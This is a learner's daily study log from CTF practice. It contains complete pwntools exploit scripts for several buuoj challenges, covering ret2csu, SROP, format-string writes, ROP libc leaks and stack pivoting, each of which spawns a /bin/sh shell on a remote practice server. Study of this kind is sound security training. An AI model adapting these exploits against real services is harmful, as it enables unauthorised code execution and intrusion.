21.07.15学习总结
Column: July 15, 2021
Tags: learning experience
05:00-05:15: 补档昨天的学习总结和继续整理ctf套路集合
05:20-05:50: 写了两种ciscn_2019_s_3的解法, 一种昨天想的csu, 一种基础srop(顺便稍微复习了一下, 注意这个由于出现了不可避免的push rbp, 所以要先处理一下rbp)
05:55-06:10: 更新ctf套路集合, 加入了部分常用代码
06:45-08:15: buuoj刷题:
fm: %x$…这玩意忘了, 做了一会才做出了…
17:00-17:40: buuoj
21:30-22:30: buuoj, ez_pz_hackover_2016这题我做的太麻烦了, 虽然也收获了点东西(fgets的第三个参数应该是加上libc的真实地址, 而且stdin这种东西, libc里直接找是找不到的)
22:40-24:00: 英语口语学习, 就学了六个元音, 练到舌头打结了…
ciscn_2019_s_3(方法一: csu):
#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./ciscn_s_3')
sh=remote('node4.buuoj.cn',28891)
elf=ELF('./ciscn_s_3')
libc=elf.libc
context.log_level='debug'
read=0x4004F1
pop_rdi=0x4005a3
mov_rax_exe=0x4004e2
csu_1=0x400580
csu_2=0x400596
syscall_addr=0x400517
#gdb.attach(sh, '''b *0x400517''')
sh.send('w'*16+p64(read))
sh.recv(0x20)
leak_stack=u64(sh.recv(8))
log.success('leak stack: '+hex(leak_stack))
'''
csu1:
0x400580 <__libc_csu_init+64>: mov rdx,r13
0x400583 <__libc_csu_init+67>: mov rsi,r14
0x400586 <__libc_csu_init+70>: mov edi,r15d
=> 0x400589 <__libc_csu_init+73>: call QWORD PTR [r12+rbx*8]
0x40058d <__libc_csu_init+77>: add rbx,0x1
0x400591 <__libc_csu_init+81>: cmp rbx,rbp
0x400594 <__libc_csu_init+84>: jne 0x400580 <__libc_csu_init+64>
csu2:
0x400596 <__libc_csu_init+86>: add rsp,0x8
0x40059a <__libc_csu_init+90>: pop rbx
0x40059b <__libc_csu_init+91>: pop rbp
0x40059c <__libc_csu_init+92>: pop r12
0x40059e <__libc_csu_init+94>: pop r13
0x4005a0 <__libc_csu_init+96>: pop r14
0x4005a2 <__libc_csu_init+98>: pop r15
0x4005a4 <__libc_csu_init+100>: ret
'''
sh.send('/bin/sh\x00'*2+p64(csu_2)+p64(0)+p64(0)+p64(0x40051b)+p64(leak_stack-0xe8)+p64(0)+p64(0)+p64(0)+p64(csu_1)+p64(pop_rdi)+p64(leak_stack-0x108)+p64(mov_rax_exe)+p64(syscall_addr))
''' rsp+8 rbx rbp:pop_rdi r12 r13 r14 r15'''
sh.interactive()
ciscn_2019_s_3(方法二: srop):
#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh=process('./ciscn_s_3')
#sh=remote('node4.buuoj.cn',28891)
elf=ELF('./ciscn_s_3')
libc=elf.libc
context.log_level='debug'
context.binary='./ciscn_s_3'
mov_rax_15=0x4004D6
syscall_addr=0x400517
read_addr=0x4004F1
pop_rbp=0x4004EB
#gdb.attach(sh, '''b *0x400517''')
sh.send('w'*16+p64(read_addr))
leak_stack=u64(sh.recv(0x28)[-8:])
log.success('leak stack: '+hex(leak_stack))
bin_sh_addr=leak_stack-0x110
frame=SigreturnFrame()
frame.rip=syscall_addr
frame.rax=constants.SYS_execve
frame.rdi=bin_sh_addr
frame.rsi=0
frame.rdx=0
frame.rsp=leak_stack
payload='/bin/sh\x00'*2+p64(pop_rbp)+p64(syscall_addr)+p64(mov_rax_15)+str(frame)
sh.send(payload)
sh.interactive()
jarvisoj_fm(基础格式化字符串, %$这玩意不计入n中):
#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./fm')
sh=remote('node4.buuoj.cn',28882)
elf=ELF('./fm')
#context.log_level='debug'
payload=p32(0x804a02c)+'%11$n'
sh.send(payload)
sh.interactive()
[HarekazeCTF2019]baby_rop2:
#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./babyrop2')
sh=remote('node4.buuoj.cn',25518)
elf=ELF('./babyrop2')
context.log_level='debug'
#libc=elf.libc
libc=ELF('./libc/libc.so.6')
pop_rdi=0x400733
pop_rsi_r15=0x400731
fmt_addr=0x400770
main_addr=0x400636
#gdb.attach(sh, '''b *0x4006ca''')
payload1='w'*0x28+p64(pop_rdi)+p64(fmt_addr)+p64(pop_rsi_r15)+p64(elf.got['read'])\
+p64(0)+p64(elf.sym['printf'])+p64(main_addr)
sh.send(payload1)
sh.recvuntil('again, ')
sh.recvuntil('again, ')
read_addr=u64(sh.recv(6).ljust(8, '\x00'))
libc_base=read_addr-libc.sym['read']
log.success('read addr: '+hex(read_addr))
log.success('libc base: '+hex(libc_base))
payload2='b'*0x28+p64(pop_rdi)+p64(libc_base+libc.search('/bin/sh\x00').next())\
+p64(libc_base+libc.sym['system'])
sh.recvuntil("What's your name? ")
sh.send(payload2)
sh.interactive()
ciscn_2019_es_2(栈迁移):
#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./ciscn_2019_es_2')
sh=remote('node4.buuoj.cn',28650)
elf=ELF('./ciscn_2019_es_2')
libc=ELF('./libc-2.27.so')
#libc=elf.libc
context.log_level='debug'
leave_ret=0x8048562
#gdb.attach(sh, '''b *0x80485cd''')
sh.send('w'*40)
sh.recvuntil('w'*40)
leak_stack=u32(sh.recv(4))
sh.recv()
log.success('leak stack: '+hex(leak_stack))
read_stack_addr=leak_stack-0x38
payload=p32(elf.sym['system'])+p32(elf.sym['main'])+p32(read_stack_addr+0xc)\
+'/bin/sh\x00'
payload+='a'*(40-len(payload))+p32(read_stack_addr-4)+p32(leave_ret)
sh.send(payload)
#sh.send('w'*40+p32(leave_ret))
sh.interactive()
ez_pz_hackover_2016(其实两次就够了):
#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./ez_pz_hackover_2016')
sh=remote('node4.buuoj.cn',29181)
elf=ELF('./ez_pz_hackover_2016')
#context.log_level='debug'
libc=ELF('./libc-2.23.so')
payload1="crashme"+p32(0)+'wwww'*3+'bbb'+p32(elf.sym['printf'])+p32(elf.sym['chall'])\
+p32(0x8048845)+p32(elf.got['stdin'])
sh.recv()
sh.sendline(payload1)
sh.recvuntil('Welcome ')
sh.recvuntil('Welcome ')
stdin_addr=u32(sh.recv(4))
libc_base=stdin_addr-libc.sym['stdin']
log.success('stdin addr: '+hex(stdin_addr))
payload2="crashme"+p32(0)+'wwww'*3+'bbb'+p32(elf.sym['fgets'])+p32(elf.sym['chall'])\
+p32(0x804a400)+p32(0x10)+p32(stdin_addr)
sh.recv()
sh.sendline(payload2)
sh.sendline('/bin/sh\x00')
payload3="crashme"+p32(0)+'wwww'*3+'bbb'+p32(elf.sym['printf'])+p32(elf.sym['chall'])\
+p32(0x8048845)+p32(elf.got['printf'])
sh.recv()
sh.sendline(payload3)
sh.recvuntil('Welcome ')
sh.recvuntil('Welcome ')
printf_addr=u32(sh.recv(4))
libc_base=printf_addr-libc.sym['printf']
log.success('libc base: '+hex(printf_addr))
payload4="crashme"+p32(0)+'wwww'*3+'bbb'+p32(libc_base+libc.sym['system'])+'bye~'\
+p32(0x804a400)
sh.recv()
sh.sendline(payload4)
sh.interactive()